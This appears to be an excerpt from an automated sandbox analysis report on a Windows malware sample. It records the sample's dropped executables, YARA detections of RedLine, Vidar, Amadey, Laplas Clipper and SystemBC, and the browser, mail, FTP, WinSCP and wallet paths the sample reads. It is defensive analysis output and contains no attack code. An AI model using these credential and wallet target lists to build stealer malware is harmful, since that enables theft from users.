Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Code function: 0_2_61EAF850 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_61EAF850

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

AV process strings found (often used to terminate AV products)

Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.61312899942613011832.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.gntuud.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.762181339.00000000003D1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.327105294.0000000001151000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected Laplas Clipper

Source: Yara match	File source: 27.0.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.821990980.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.407007293.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: avicapn32.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\1000018002\avicapn32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298618389.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Yara detected SystemBC

Source: Yara match	File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1307A sqlite3_transfer_bindings,	0_2_61E1307A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D5E6 sqlite3_bind_int64,	0_2_61E2D5E6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D595 sqlite3_bind_double,	0_2_61E2D595
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E0B431 sqlite3_clear_bindings,	0_2_61E0B431
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E037F3 sqlite3_value_frombind,	0_2_61E037F3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,	0_2_61E2D781
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,	0_2_61E2D714
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D68C sqlite3_bind_pointer,	0_2_61E2D68C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D65B sqlite3_bind_null,	0_2_61E2D65B
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D635 sqlite3_bind_int,	0_2_61E2D635
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D9B0 sqlite3_bind_value,	0_2_61E2D9B0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D981 sqlite3_bind_text16,	0_2_61E2D981
